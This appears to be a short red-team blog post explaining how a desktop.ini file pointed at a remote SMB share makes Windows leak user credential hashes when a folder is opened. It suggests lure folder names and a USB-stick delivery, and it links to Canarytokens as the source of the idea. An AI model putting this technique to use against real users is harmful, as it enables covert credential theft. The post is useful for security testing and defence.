One of the Canary triggers works by taking advantage of the way Microsoft Windows presents folders to it’s users, this happens by checking for a ==hidden== desktop.ini file that will point the OS to folder view preferences.
Canary works by directing the preferences to a remote server, when that request comes in, we know the folder has been entered… very sneaky! ( I didn’t know about this technique until I was exploring the canarytokens.org available payloads – check them out https://canarytokens.org/generate
So I figured, if we point it to a remote location with SMB authentication on it, we know that windows will automatically send it’s current user’s credentials to the location, I’ll get hashes!
If you are ever on a RedTeam and you have access to a shared folder plant one in there will need to make a share read-only for the desktop.ini to persist with a name like PeopleGettingSacked or Movies or CEO Holiday Pics … whatever, you know better than me…
Additionally, if you put the desktop.ini flat on a USB stick as soon as the pen is mounted (unless auto-run is disabled, it will open up the folder automatically (actioning the attack)
I bet this is already being used out there ! … very sneaky/powerful, I had to share … in fact, I can’t help thinking this might be a very well known thing and I’m out of the loop -_-
I think there is some caching of the desktop.ini too (at least with Windows 10, as when I ejected my evil USB I could still see incoming requests from my machine. – will follow up with that.
An in-depth look into options when writing a desktop.ini file, possibly more opportunities for trouble? https://hwiegman.home.xs4all.nl/desktopini.html
Attacker & User view : https://www.youtube.com/watch?v=t8zqJm5d8gg